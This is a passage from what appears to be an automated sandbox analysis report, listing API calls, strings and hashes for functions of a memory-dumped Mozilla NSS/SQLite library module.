                                                                                                                                                                                                                                                      • String ID: application data$early application data$handshake data$key
                                                                                                                                                                                                                                                      • API String ID: 1461918828-2699248424
                                                                                                                                                                                                                                                      • Opcode ID: ef28750de841bf79874c229e47a6781a16d50e7ecf727d4a54f433801830d25a
                                                                                                                                                                                                                                                      • Instruction ID: 1544dbbd152ab4be32c6b6c89bdd2f3cae6f931d34fa216a2c69275ba2e951b6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef28750de841bf79874c229e47a6781a16d50e7ecf727d4a54f433801830d25a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48C104B1B002159BEB14CF65CC80BAAB7B4FF49318F144129E909DBA51E771E954CBE1
                                                                                                                                                                                                                                                      Function 6C4B3850 Relevance: 21.2, APIs: 14, Instructions: 233COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B389F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B38B3
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B38F1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B390F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B3923
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3972
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B3996
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B39AE
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B39DB
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3A16
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B3A36
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3A4E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3A77
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B3A8F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalSectionUnlock$Enter$calloc$ErrorLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1642523270-0
                                                                                                                                                                                                                                                      • Opcode ID: ae638e4bd765c7080aa5d2dfe0f60ba117384bbd9a2fd518311ac84bac2b3f50
                                                                                                                                                                                                                                                      • Instruction ID: 6118000e7ee5ad5eaf594f9803f90c231e712b742c6026771cc56f7b01300e75
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae638e4bd765c7080aa5d2dfe0f60ba117384bbd9a2fd518311ac84bac2b3f50
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC917775D002189FDB00EF69D884FAABBB4BF09318F155169EC15AB711EB30E984CBA5
                                                                                                                                                                                                                                                      Function 6C3FECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FED0A
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEE68
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEF87
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C3FEF98
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FF483
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C3FF492
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C3FF48D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4101233201-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 285ccd160ee4a9d34fa76abc9c69d73c58e9f9596c1e55a52dd1d4e0f6b08f88
                                                                                                                                                                                                                                                      • Instruction ID: 4cad550ff367a7828ddf79b4d511e18fe4c2b9c9049de29dd9b5e2141a5aaa24
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 285ccd160ee4a9d34fa76abc9c69d73c58e9f9596c1e55a52dd1d4e0f6b08f88
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0362F334A043458FDB04CF64C880B9ABBF1BF49318F184999D8655BB92D776E887CFA1
                                                                                                                                                                                                                                                      Function 6C497D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6C497DDC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C497DF3
                                                                                                                                                                                                                                                      • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C497F07
                                                                                                                                                                                                                                                      • PK11_GetPadMechanism.NSS3(00000000), ref: 6C497F57
                                                                                                                                                                                                                                                      • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C497F98
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6C497FC9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C497FDE
                                                                                                                                                                                                                                                      • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C498000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C497F0C,?,00000000,00000000,00000000,?), ref: 6C4B943B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C4B946B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C4B9546
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C498110
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C49811D
                                                                                                                                                                                                                                                      • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C49822D
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C49823C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1923011919-0
                                                                                                                                                                                                                                                      • Opcode ID: 3d1124ec9153cc42975f9aaf5cee9d1dd213df5c75a9bfdd5ace135cfb3653bd
                                                                                                                                                                                                                                                      • Instruction ID: 3d6cabd613790614b46582de1963f51f220e246dab9f8b21b7d24ccd2387368f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d1124ec9153cc42975f9aaf5cee9d1dd213df5c75a9bfdd5ace135cfb3653bd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DC152B1D442699BEF21CF14CC40FDABBB9AF15348F0081E9E91DA6641E7319E85CFA1
                                                                                                                                                                                                                                                      Function 6C40AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B039
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B090
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B0A2
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?,?,?), ref: 6C40B100
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B115
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B12D
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C40C6FD,?,?,?,?,6C45F965,00000000), ref: 6C3F9F0E
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C45F965,00000000), ref: 6C3F9F5D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                      • String ID: `Xl
                                                                                                                                                                                                                                                      • API String ID: 3155957115-2906863447
                                                                                                                                                                                                                                                      • Opcode ID: 9e7e13960ee60444cd0230765f6eef5c2bd0ea210cdb44b6913bbbd189f276c5
                                                                                                                                                                                                                                                      • Instruction ID: 99099527c63fbb061568726c3277ef77c8bda0216a9976a7704aa908567d0837
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e7e13960ee60444cd0230765f6eef5c2bd0ea210cdb44b6913bbbd189f276c5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD91BAB0B442068FEB04CF24C884F6AB7B1FF45309B154A3DE4169BB50EB34E981CB99
                                                                                                                                                                                                                                                      Function 6C4A0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_PubDeriveWithKDF.NSS3 ref: 6C4A0F8D
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A0FB3
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4A1006
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6C4A101C
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4A1033
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4A103F
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C4A1048
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A108E
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A10BB
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C4A10D6
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A112E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15B8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15C1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A162E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A1637
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1510409361-0
                                                                                                                                                                                                                                                      • Opcode ID: 3dd8b16757146c2e012579e9a4c98325792c97e4cb908736411145253bdf1af3
                                                                                                                                                                                                                                                      • Instruction ID: 2c40c2aa05501ae4cc48840da4baa43e46b3682fb29e5a46d253667e6808e001
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dd8b16757146c2e012579e9a4c98325792c97e4cb908736411145253bdf1af3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7571FFB5E04201CFDB00CFA6CC80EAAB7B5BF58318F14862CE90997B15E771D946CB91
                                                                                                                                                                                                                                                      Function 6C4C1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C1F19
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C2166
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C228F
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C23B8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C241C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$Error
                                                                                                                                                                                                                                                      • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                      • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                      • Opcode ID: 279f69142dcc704d427feda416484e0c18e29ef950b20e5698c8df1d4e8f70b3
                                                                                                                                                                                                                                                      • Instruction ID: 659b0a025c6e2e616514a7169c98a9ec15efc2ab9a3bda8b3a13508204cb1fea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 279f69142dcc704d427feda416484e0c18e29ef950b20e5698c8df1d4e8f70b3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 100230AAF0C7C86EF731C271C44CFC76AE09B45329F18266EC59E46793CBE859498352
                                                                                                                                                                                                                                                      Function 6C400FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C40103E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C401139
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C401190
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C401227
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C40126E
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C40127F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                                                      • String ID: PXl$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                                      • API String ID: 2733752649-599401849
                                                                                                                                                                                                                                                      • Opcode ID: c412f2177311994f0d3dd46c194a51709b64330d0e44857f393b415bd7a45882
                                                                                                                                                                                                                                                      • Instruction ID: fcc294771b3d1a573e1846f118ab1fe3be98fb48d25d47074b38ea2367236cd4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c412f2177311994f0d3dd46c194a51709b64330d0e44857f393b415bd7a45882
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A713A317457019BEB08DF64DC85E6A33B6FB8A329F15423DE8119BB80DB70E941C79A
                                                                                                                                                                                                                                                      Function 6C4C6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C60
                                                                                                                                                                                                                                                      • PR_ExplodeTime.NSS3(00000000,6C471C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C94
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
